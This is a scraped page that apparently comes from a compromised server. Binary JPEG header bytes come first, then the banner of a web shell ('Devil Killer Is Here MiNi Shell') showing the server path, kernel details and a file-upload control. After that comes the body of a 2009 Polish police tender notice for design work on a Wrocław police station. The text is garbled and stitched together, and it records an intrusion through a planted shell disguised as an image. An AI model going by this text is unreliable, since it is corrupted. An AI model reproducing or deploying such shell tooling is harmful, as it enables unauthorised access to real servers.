JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090310/48271-N-2009.html

<p class="kh_header"><b>Wrocław: Przedmiotem zamówienia jest wykonanie programu inwestycji, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz dokumentacji projektowo - kosztorysowej wraz z uzyskaniem odpowiednich uzgodnień i decyzji pozwolenia na budowę dla potrzeb przebudowy i remontu budynku Komisariatu Policji Wrocław Ołbin przy ul. Rydygiera 46/48 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 48271 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji we Wrocławiu , ul Podwale 31-33, 50-040 Wrocław, woj. dolnośląskie, tel. (071) 340 38 00, faks (071) 782 41 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dolnoslaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie programu inwestycji, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz dokumentacji projektowo - kosztorysowej wraz z uzyskaniem odpowiednich uzgodnień i decyzji pozwolenia na budowę dla potrzeb przebudowy i remontu budynku Komisariatu Policji Wrocław Ołbin przy ul. Rydygiera 46/48 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie programu inwestycji, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz dokumentacji projektowo - kosztorysowej wraz z uzyskaniem odpowiednich uzgodnień i decyzji pozwolenia na budowę dla potrzeb przebudowy i remontu budynku Komisariatu Policji Wrocław Ołbin przy ul. Rydygiera 46/48 we Wrocławiu, w zakresie:
-	przebudowy i remontu całego parteru budynku - w szczególności strefy obsługi interesantów;
-	przebudowy i adaptacji poddasza;
-	przebudowy i remontu dachu;
-	rewaloryzacji elewacji, w tym również stolarki okiennej i drzwiowej;
-	rewaloryzacji i przebudowy elementów zagospodarowania terenu oraz infrastruktury zewnętrznej; 
oraz pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych. Szczegółowy opis przedmiotu zamówienia został przedstawiony w załączniku nr 1 do SIWZ.
2.	Przedmiotowy budynek położony jest przy ul. Rydygiera 46/48 we Wrocławiu. Planowany zakres remontu i przebudowy, które będą realizowane w oparciu o zamawianą dokumentację, jest następujący: 
A.	Przebudowa i remont elementów zagospodarowania terenu oraz infrastruktury zewnętrznej:
-	przebudowa powierzchni utwardzonych przyległych do budynku, w tym plac od strony oficyny,
-	remont zewnętrznych schodów wejściowych do budynku,
-	remont wiaty samochodowej elementów małej architektury,
-	budowa obudowy śmietnikowej od strony oficyny budynku,
-	budowa murków oporowych,
-	remont i przebudowa ogrodzenia i bramy wjazdowej,
-	rozwiązanie odprowadzenia wód opadowych,
-	projekt oświetlenia terenu,
-	remont i przebudowa chodnika na styku z budynkiem od strony frontowej.
B.	Przebudowa strefy parteru budynku, w tym:
-	przebudowa strefy wejścia wraz z przystosowaniem obiektu dla osób niepełnosprawnych,
-	wydzielenie recepcji oraz przebudowa pomieszczeń służby dyżurnej i przyległych pomieszczeń biurowych i pomocniczych poziomu parteru,
-	przebudowa węzłów sanitarnych wraz z wydzieleniem toalety dla osób niepełnosprawnych.
C.	Adaptacja poddasza:
-	adaptacja poddasza na cele pomieszczeń biurowych, szatni wraz z węzłami sanitarnymi, pomieszczenia socjalnego, pomieszczenia porządkowego oraz magazynów pomocniczych,
-	zakres prac w obrębie strychu obejmie:
-	wymianę istniejącego poszycia dachowego na wykonane z blachy miedzianej oraz wymianę deskowania,
-	remont i przebudowa konstrukcji więźby dachowej dla celów adaptacji poddasza,
-	przebudowa murowanych trzonów wentylacyjnych,
-	projekt instalacji odgromowej.
D.	Remont ogólny pomieszczeń piwnicy.
E.	Remont elewacji:
-	wykonanie izolacji przeciwwilgociowej poziomej za pomocą iniekcji ciśnieniowej oraz pionowej,
-	remont ceglanej płaszczyzny ścian oraz detalu,
-	rozpoznanie przyczyn i zabezpieczenie spękań ścian w strefie frontu oraz elewacji bocznej budynku.
F.	Stolarka okienna i drzwiowa:
-	całkowita wymiana stolarki okiennej z zachowaniem pierwotnego jej podziału oraz wystroju,
-	wymiana podokienników wewnętrznych i zewnętrznych,
-	renowacja istniejących drzwi wejściowych od strony frontowej i oficynowej,
-	wymiana stolarki drzwiowej pomieszczeń biurowych oraz pomieszczeń gospodarczych strefy piwnicy (drzwi wewnętrzne i zewnętrzne).
G.	Prace w obrębie instalacji:
-	instalacje sanitarne:
-	rozwiązanie wentylacji pomieszczeń w strefie przebudowy, w tym:
-	wentylacji grawitacyjnej,
-	wentylacji grawitacyjnej ze wspomaganiem,
-	wentylacji wywiewno - nawiewnej,
-	wykonanie klimatyzacji wybranych pomieszczeń (pom. oficera dyżurn.),
-	przebudowa instalacji wody użytkowej zimnej i ciepłej, 
-	przebudowa instalacji c.o.,
-	przebudowa instalacji hydrantowej,
-	instalacje elektryczne i niskoprądowe:
-	przebudowa instalacji:
-	modernizacja WLZ wraz z tablicą rozdzielczą,
-	instalacja wewnętrzna oświetleniowa,
-	instalacja zasilania gniazd wtyczkowych 1-fazowych,
-	instalacja kierunkowa ewakuacyjna (komunikacja),
-	instalacja sieci strukturalnej,
-	instalacja monitoringu kamerowego (korytarz),
-	instalacja kontroli dostępu (do wybranych pomieszczeń oraz stref budynku),
-	instalacja sygnalizacji pożarowej,
-	ochrona przed porażeniem prądem elektrycznym (wyłączniki szybkie i różnicowo - prądowe).
H.	Instalację elektryczną należy wyposażyć w przeciwpożarowy wyłącznik prądu umieszczony w pobliżu głównego wejścia do budynku. Wyłącznik należy odpowiednio oznakować.
Przybliżone parametry wielkościowe, struktura zatrudnienia:
-	powierzchnia placu utwardzonego                    828 m2,
-	powierzchnia osłony śmietnikowej                 	13 m2,
-	powierzchnia zabudowy budynku głównego  425 m2,
-	powierzchnia budynku (strefa przebudowy):
-	piwnica                               425 m2,
-	parter                                 425 m2,
-	poddasze                            340 m2,
                S dla strefy opracowania:  1 190 m2,
-	kubatura strefy remontu pomieszczeń       3 355 m3,
-	struktura zatrudnienia:
-	91 policjantów, w tym:
-	2 kierownictwo;
-	55 Sekcja Prewencji;
-	15 Sekcja Kryminalna;
-	19 Sekcja Dochodzeniowo - Śledcza;
-	8 pracowników cywilnych.
Według wstępnych założeń na parterze poza służbą dyżurną (na dzień dzisiejszy w systemie ciągłym - 24 godziny na dobę 2 funkcjonariuszy, 5 zmian - łącznie 10 policjantów) i recepcją pracować będzie 4 policjantów i 2 pracowników cywilnych.
Realizacja powyższego zakresu remontu i przebudowy wymaga opracowania dokumentacji pod kątem wykonywania następujących robót budowlanych:
-	robót rozbiórkowych (np. istniejących ścianek działowych), wyburzeń (np. wykonanie otworów drzwiowych w nowych miejscach) oraz demontażu (np. starej stolarki okiennej i drzwiowej, starych instalacji i urządzeń sanitarnych oraz elektrycznych),
-	przebudowy strefy wejścia w celu umożliwienia wejścia osobom niepełnosprawnym, założenia ciągu czyszczącego w wejściu,
-	budowy nowych ścianek działowych,
-	ewentualne wymiany lub wzmocnienie elementów konstrukcyjnych budynku, w przypadku stwierdzenia, iż są one w złym stanie technicznym lub będzie to uwarunkowane zwiększeniem albo niekorzystną zmianą układu obciążeń po wykonaniu adaptacji poddasza (wg sporządzonej na cele projektu opinii technicznej dotyczącej konstrukcji),
wyodrębnienie w układzie funkcjonalnym parteru budynku strefy tzw. funkcji recepcyjnej spełniające wymagania resortowe, niezbędne dla tej strefy pomieszczenia, takie jak np. strefa wejścia (z wiatrołapem), recepcja z poczekalnią, węzły sanitarne przystosowane dla osób niepełnosprawnych, pokój przesłuchań małoletnich ofiar i świadków przestępstw tzw. niebieski pokój, pokoje przyjęć interesantów - powinny posiadać odpowiednią powierzchnię, sposób i rodzaj wykończenia, wymagane przepisami instalacje, wyposażenie itp.
-	wyodrębnienie w układzie funkcjonalnym parteru budynku strefy zamkniętej, obejmującej m.in.  zespół pomieszczeń służby dyżurnej (kierownika jednostki), w skład której wchodzą ( stanowisko dowodzenia, węzeł sanitarny, aneks socjalny, podręczny magazyn broni, pom. łączności specjalnej),
-	wyodrębnienie w układzie funkcjonalnym parteru budynku pozostałych pomieszczeń, nie wchodzących bezpośrednio w skład ww. stref,
-	wykonanie dla opisanych powyżej stref robót ogólnobudowlanych i instalacyjnych,  
-	wykonania nowych podłóg i posadzek,
-	wykonania okładzin ściennych z płytek w pomieszczeniach sanitarnych,
-	wyk. tynków wewnętrznych oraz malowania,
-	opracowania zabezpieczenia, szybami bezpiecznymi typu P4/P3, otworów okiennych wybranych pomieszczeń,
-	projekt wykonania izolacji przeciwwilgociowej ścian budynku strefy piwnicy i parteru (izolacje pionowe oraz poziome, zastosowanie tynków renowacyjnych),
-	montaż rusztowania i wykonanie zadaszeń nad wejściami do budynku,
-	wymiana stolarki okiennej budynku (na nową, drewnianą, z zachowaniem wymiarów i podziałów, za wyjątkiem okien poddasza które zostaną zmienione na połaciowe),
-	montaż okien połaciowych,
-	renowacja drzwi wejściowych od strony frontowej,
-	wymiana drzwi stalowych zewnętrznych (elewacja zachodnia),
-	zabezpieczenie stolarki okiennej,
-	remont elewacji frontowej wschodniej oraz pozostałych elewacji południowej i zachodniej o zabytkowym charakterze (naprawa i rekonstrukcja detalu),
-	wzmocnienie i naprawa osłabionych, pękniętych i uszkodzonych miejsc elewacji,
-	wstępne mycie elewacji
-	wymiana uszkodzonych fragmentów elewacji (cegieł, podokienników ceramicznych),
-	wykonanie robót, murarskich i sztukatorskich związanych z remontem elewacji,
-	uzupełnienie drobnych ubytków ceglanych poprzez kitowanie,
-	czyszczenie zasadnicze elewacji, 
-	czyszczenie i remont schodów zewnętrznych,
-	oczyszczanie zwietrzałych spoin i wykonanie nowych,
-	oczyszczenie i malowanie metalowych elementów związanych z elewacją,
-	impregnacja elewacji,
-	wymiana deskowania i zużytych elementów konstrukcyjnych więźby dachowej,
-	wzmocnienie elementów konstrukcyjnych więźby dachowej,
-	rozbiórka istniejących lukarn i przystosowanie konstrukcji więźby do montażu okien połaciowych,
-	przemurowanie lub naprawa kominów, wieżyczek, attyk,
-	demontaż istniejącego pokrycia dachowego z blachy,
-	demontaż istniejącego systemu odwodnienia ( rury spustowe, rynny),
-	demontaż pozostałych elementów (ławki kominiarskie, maszt antenowy z odciągami, instalacja odgromowa),
-	montaż nowego pokrycia z blachy miedzianej,
-	montaż nowego systemu odwodnienia z blachy miedzianej,
-	montaż nowych elementów (np. płotki śniegowe, maszt antenowy z odciągami, ławki kominiarskie),
-	ocieplenie połaci dachowej wełną mineralną, montaż paraizolacji i folii paroprzepuszczalnej,
-	rozebranie osłon okiennych, zadaszeń i rusztowań,
-	wykonanie oświetlenia miejscowego ze ściany budynku,
-	remontu (całkowitej wymiany) połączonego z przebudową oraz wykonaniem nowych fragmentów instalacji sanitarnych - w zakresie instalacji ciepłej i zimnej wody użytkowej (wykonanie cyrkulacji) oraz instalacji kanalizacyjnej,
-	wykonania wentylacji grawitacyjnej ze wspomaganiem dla pomieszczeń sanitarnych,
-	wykonanie klimatyzacji pomieszczenia oficera dyżurnego,
-	roboty ziemne związane z wykonaniem izolacji przeciwwilgociowej ścian strefy piwnicy i przyziemia,
-	wykonanie odpowiednich badań i analiz związanych z określeniem stanu zasolenia ścian, rozwarstwienia stratygraficznego powłok malarskich ściany oraz detalu ozdobnego.
-	wykonanie niezbędnych robót w pomieszczeniach otwieranych od strony placu, w związku z regulacją poziomu jego nawierzchni (obniżenie poziomu posadzek, remont ogólny pomieszczeń),
-	remontu, połączonego z przebudową, polegającą na wykonaniu nowych fragmentów instalacji elektrycznych - w zakresie przyłącza WLZ, głównej tablicy rozdzielczej,  instalacji zasilania gniazd wtyczkowych oraz instalacji oświetleniowej (w tym również ewakuacyjnej i kierunkowej strefy przebudowywanych pomieszczeń),
-	przebudowa instalacji sieci strukturalnej oraz telefonicznej,
-	wykonania systemu sygnalizacji przeciwpożarowej, alarmowej, przyzywowej oraz systemu monitoringu wewnętrznego.
-	wykonanie monitoringu zewnętrznego,
-	wymiana istniejącego ogrodzenia od strony ul. Nobla, wykonanie nowej bramy wjazdowej,
-	remont ścian murowanych od strony zachodniej i północnej placu ( zbicie starych tynków, naprawa pęknięć i szczelin, wykonanie nowego tynku, malowanie), 
-	przebudowa nawierzchni placu
-	demontaż istniejącej nawierzchni wraz z warstwami podbudowy,
-	przebudowa instalacji kanalizacyjnej placu ( wykonanie dwóch dodatkowych wpustów),
-	wykonanie muru oporowego, równoległego do budynku, umożliwiającego wykonanie nowej nawierzchni placu na dwóch różnych poziomach: niższym bezpośrednio przy budynku i wyższym, na pozostałej powierzchni, 
-	budowa nowej nawierzchni wraz z konstrukcją podbudowy,
-	demontaż istniejącej, skorodowanej konstrukcji wiaty garażowej,
-	wykonanie nowej konstrukcji nośnej i zadaszenia przy wykorzystaniu istniejących fundamentów i elementów konstrukcji nadających się do ponownego wykorzystania,
-	adaptacja poddasza
-	usunięcie zużytych warstw posadzkowych stropu nad II piętrem,
-	wymiana lub wzmocnienie stropu,
-	wykonanie nowych warstw podposadzkowych,
-	wykonanie robót budowlanych i instalacyjnych związanych z uzyskaniem żądanego układu funkcjonalnego w poziomie poddasza.
ZAKRES ZAMAWIANEJ DOKUMENTACJI PROJEKTOWEJ:
-	inwentaryzacja oraz ocena stanu technicznego obiektu i infrastruktury zewnętrznej dla celów projektu - w 2 egz.,
-	program inwestycji - w 2 egz.,
-	koncepcja przebudowy budynku - w 2 egz.,
-	wielobranżowy projekt budowlany - w 5 egz.,
-	informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ), jako część projektu budowlanego,
-	wielobranżowy projekt wykonawczy, w pełnym zakresie dla wszystkich występujących branż  - w 4 egz., w tym, w szczególności:
-	zagospodarowanie terenu, 
-	infrastruktura zewnętrzna,
-	architektura,
-	konstrukcje,
-	instalacje i sieci sanitarne,
-	instalacje i sieci elektryczne,
-	instalacje niskoprądowe, logiczne (p. pożarowe, systemu antywłamaniowego, kontroli     dostępu, monitoringu TV, komputerowej, telekomunikacyjnej, TV),
-	kosztorys inwestorski z rozbiciem na poszczególne branże oraz etapy -w 2 egz.,
-	przedmiar robót z rozbiciem na poszczególne branże - w 2 egz.,
-	specyfikacja techn. wykonania i odbioru robót budowlanych - w 2 egz.
Poszczególne egzemplarze dokumentacji projektowej powinny być zszyte w sposób trwały, całość należy ponumerować i opisać w zestawieniu dokumentacji, ponadto należy przekazać całość opracowania w wersji elektronicznej, w następujących formatach:
-	rysunki projektowe jako pliki .dwg (v.14) oraz .pdf,
-	opisy techniczne jako pliki .doc oraz *.pdf,
-	kosztorysy oraz przedmiary w programie Norma 3 pliki .kst lub .ath oraz .pdf.
Dokumentację należy wykonać w sposób zgodny z wymaganiami określonymi przez Zamawiającego, dotyczącymi przedmiotu, zakresu, szaty graficznej i formy przekazania dokumentacji, a w szczególności  zgodnie z następującymi aktami prawnymi:
-	Ustawą Prawo budowlane Dz. U. z 2006, Nr 156, poz. 1118 z późniejszymi zmianami
-	Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tekst jednolity: Dz. U. z 2002 r. Nr 75, poz. 690 ze zmianami),
-	Ustawą z dnia 23.07.2003 r. o ochronie zabytków i opiece nad zabytkami,
-	Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003 r. Nr 120, poz. 1133)
-	Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego Dz. U. z 2004 r. Nr 202, poz. 2072
-	Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzenia kosztorysu inwestorskiego obliczania planowych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym Dz. U. z 2004 r. Nr 130, poz. 1389
-	Rozporządzenie Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia Dz. U. z 2003 r. Nr 120, poz. 1126
-	Ustawa Prawo Zamówień publicznych z dnia 29.01.2004r., tekst jednolity Dz. U. z 2007r. Nr 223, poz. 1655 - przepisy ustawę zakazujące określanie przedmiotu zamówienia w sposób utrudniający uczciwą konkurencję, np. poprzez wskazanie nazw producentów lub znaków towarowych (art. 29 - 30 ustawy) - ponieważ dokumentacja projektowa i specyfikacje techniczne wykonania i odbioru robót budowlanych będą stanowiły podstawę opisu przedmiotu zamówienia na roboty budowlane
-	wypisem i wyrysem z miejscowego planu zagospodarowania przestrzennego,
a także innymi aktami prawnymi obowiązującymi w przedmiotowej sprawie.
Do dokumentacji należy dołączyć: 
-	Pisemne oświadczenie Projektanta, potwierdzające jej zgodność z umową, obowiązującymi przepisami i normami oraz kompletność z punktu widzenia celu, któremu ma służyć. Pisemne oświadczenie, o którym mowa wyżej, stanowi integralną część dokumentacji projektowej.
-	Decyzję/pozwolenie na budowę (pozwolenie na wykonanie w/w robót budowlanych), wydaną na rzecz Zamawiającego wraz z wszystkimi koniecznymi opiniami i uzgodnieniami wymaganymi przez prawo budowlane, w szczególności: rzeczoznawców do spraw zabezpieczeń przeciwpożarowych, bezpieczeństwa i higieny pracy oraz warunków higieniczno - sanitarnych (upoważnionego przez Głównego Inspektora Sanitarnego MSWiA) oraz Miejskiego Konserwatora Zabytków.
-	W razie konieczności należy uzyskać zgodę na odstępstwo od obowiązujących przepisów (ze względu na sporządzanie dokumentacji na cele remontu i przebudowy budynku istniejącego).
Przed wykonaniem projektu budowlanego oraz wykonawczego stanowiącego przedmiot niniejszego zamówienia należy:
-	wykonać inwentaryzację ogólnobudowlaną obiektów na cele projektu, 
-	sporządzić opinię techniczną, na cele projektu, dotyczącą stanu technicznego budynku, ze szczególnym uwzględnieniem stanu stropów, więźby dachowej oraz ścian konstrukcyjnych,
-	wykonać wg zaleceń zamawiającego koncepcję architektoniczno - budowlaną przebudowy budynku, zawierającą wstępnie proponowane rozwiązania techniczno materiałowe w zakresie rozwiązań konstrukcyjno - budowlanych oraz instalacyjnych. 
-	Opracowanie projektu budowlanego musi być poprzedzone pozytywnym zaopiniowaniem w/w koncepcji przez zleceniodawcę.
Nadzór autorski w trakcie realizacji inwestycji powinien obejmować:
-	kontrolowanie, w trakcie realizacji robót budowlanych, zgodności rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową,
-	uzupełnienie szczegółów dokumentacji projektowej oraz wyjaśnienie wykonawcy robót budowlanych wątpliwości powstałych w toku ich realizacji,
-	udział w naradach technicznych,
-	udział w odbiorze poszczególnych istotnych części robót budowlanych oraz odbiorze końcowym zadania,
-	współudział w sporządzaniu przez wykonawcę robót budowlanych dokumentacji powykonawczej uwzględniającej wszystkie zmiany wprowadzone do dokumentacji projektowej w trakcie realizacji.
Liczba wizyt głównego projektanta oraz projektantów branżowych na budowie, wynikać powinna z uzasadnionych potrzeb określonych każdorazowo przez zamawiającego lub występującego w jego imieniu inspektora nadzoru, a w wyjątkowych sytuacjach przez wykonawcę robót budowlanych realizowanych na podstawie zamawianej dokumentacji.
Opis konstrukcyjny i wykończenia budynku:
Budynek posiada trzy kondygnacje nadziemne o charakterze użytkowym, nieużytkowe poddasze oraz jest podpiwniczony. Dach stromy 3- spadowy. Ściany budynku z cegły ceramicznej pełnej na zaprawie cementowo- wapiennej. Elewacje licowane cegłą licówką. Stropy nad piwnicami - ceglane odcinkowe, nad parterem i I piętrem płyty żelbetowych na dźwigarach stalowych, nad II piętrem - w południowej części budynku drewniane, natomiast w części północnej - takie jak nad pierwszym piętrem. Dach o konstrukcji drewnianej, kryty blachą ocynkowaną na deskowaniu. Schody w piwnicy i na wysokości parteru - kamienne, wyżej stalowe  ze stopniami drewnianymi. Okna drewniane skrzynkowe. Drzwi drewniane, płycinowe. Posadzki: w hallu- terakota, w piwnicy i na korytarzach- cementowe, w pozostałych pomieszczeniach podłogi drewniane z desek na legarach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.32.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium.
1.1.	Wadium wnosi się przed upływem terminu składania ofert.
1.2.	Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na rachunek zamawiającego w banku: NBP oddział okręgowy Wrocław, numer konta: 68101016740000971391200000 z adnotacją: Wadium - numer sprawy PU-2380-065-045/2009.
1.3.	Wadium może być wniesione w jednej lub kilku następujących formach:
1.3.1.	pieniądzu
1.3.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
1.3.3.	gwarancjach bankowych
1.3.4.	gwarancjach ubezpieczeniowych
1.3.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.)
1.4.	W przypadku wadium wnoszonego w pieniądzu zamawiający uznaje za prawidłowy termin jego     wniesienia datę wpływu na konto zamawiającego, a nie datę dokonania przelewu. 
1.5.	Wadium wniesione w postaci innej niż pieniądz musi zawierać klauzulę, iż jest nieodwołalne, bezwarunkowe i będzie wypłacone na każde żądanie Zamawiającego wtedy, gdy zaistnieje jedna z przesłanek określonych w art. 46 ust. 4a lub ust. 5 z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. 2007 r. Nr 223 poz. 1655 ze zm.: Dz. U. z 2008 r. Nr 171, poz. 1058; Dz. U. Nr 220, poz. 1420). 
1.6.	Jeśli wadium wnoszone jest w formie innej niż pieniądz, to oryginał dokumentu (wadium) wykonawca składa w siedzibie zamawiającego w Wydziale Zamówień Publicznych i Funduszy Pomocowych Komendy Wojewódzkiej Policji we Wrocławiu; kontakt tel.: (071) 340 3973 lub (071)340 3800, a kopię tego dokumentu - poświadczoną za zgodność z oryginałem przez wykonawcę - zaleca się dołączyć do oferty. 
1.7.	Wysokość wadium wynosi: 2400,00 zł. 
1.8.	Zasady zwrotu wadium
1.8.1.	Zgodnie z art. 46 ust. 1 ustawy, wadium zostanie zwrócone niezwłocznie jeżeli:
